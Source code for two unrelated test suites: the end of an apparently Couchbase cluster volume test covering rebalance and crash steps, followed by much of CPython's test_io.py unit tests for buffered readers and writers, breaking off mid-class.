self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 13: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
if self.stop_rebalance:
rebalance_task = self.pause_rebalance()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.print_stats()
th = threading.Thread(target=self.crash_thread,
kwargs={"graceful": False})
th.start()
while self.crash_count < self.crashes:
continue
self.stop_crash = True
th.join()
###################################################################
self.PrintStep("Step 14: Start the entire process again")
self.loop += 1
if self.loop < self.iterations:
self.sleep(10)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.print_stats()
self.log.info("Volume Test Run Complete")
self.task_manager.abort_all_tasks()
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as a attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import os
import sys
import time
import array
import threading
import random
import unittest
import warnings
import weakref
import gc
import abc
from itertools import chain, cycle, count
from collections import deque
from test import support
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin1") as f:
return f._CHUNK_SIZE
class MockRawIO:
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
return b""
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise IOError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
self._blocker_char = None
self._write_stack.append(b[:n])
raise self.BlockingIOError(0, "test blocking", n)
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 12)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 1)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(IOError, fp.read)
self.assertRaises(IOError, fp.readline)
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(IOError, fp.write, b"blah")
self.assertRaises(IOError, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(IOError, fp.write, "blah")
self.assertRaises(IOError, fp.writelines, ["blah\n"])
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
if not support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
class CIOTest(IOTest):
pass
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEquals(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEquals(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEquals(b"abc", bufio.read())
def test_read(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"abcdef", bufio.read(6))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"a", bufio.read(1))
self.assertEquals(b"b", bufio.read1(1))
self.assertEquals(rawio._reads, 1)
self.assertEquals(b"c", bufio.read1(100))
self.assertEquals(rawio._reads, 1)
self.assertEquals(b"d", bufio.read1(100))
self.assertEquals(rawio._reads, 2)
self.assertEquals(b"efg", bufio.read1(100))
self.assertEquals(rawio._reads, 3)
self.assertEquals(b"", bufio.read1(100))
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEquals(bufio.readinto(b), 2)
self.assertEquals(b, b"ab")
self.assertEquals(bufio.readinto(b), 2)
self.assertEquals(b, b"cd")
self.assertEquals(bufio.readinto(b), 2)
self.assertEquals(b, b"ef")
self.assertEquals(bufio.readinto(b), 1)
self.assertEquals(b, b"gf")
self.assertEquals(bufio.readinto(b), 0)
self.assertEquals(b, b"gf")
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEquals(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEquals(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEquals(b"abcd", bufio.read(6))
self.assertEquals(b"e", bufio.read(1))
self.assertEquals(b"fg", bufio.read())
self.assertEquals(b"", bufio.peek(1))
self.assertTrue(None is bufio.read())
self.assertEquals(b"", bufio.read())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEquals(b"abcdefg", bufio.read())
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
class CBufferedReaderTest(BufferedReaderTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEquals(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEquals(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEquals(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEquals(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEquals(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEquals(bufio.write(b"abcd"), 4)
self.assertEquals(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEquals(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEquals(written, 16)
self.assertEquals(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEquals(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEquals(b"abc", writer._write_stack[0])
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEquals(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 3)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEquals(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings() as w:
warnings.simplefilter("always", DeprecationWarning)
self.tp(self.MockRawIO(), 8, 12)
self.assertEqual(len(w.warnings), 1)
warning = w.warnings[0]
self.assertTrue(warning.category is DeprecationWarning)
self.assertEqual(str(warning.message),
"max_buffer_size is deprecated")
class CBufferedWriterTest(BufferedWriterTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
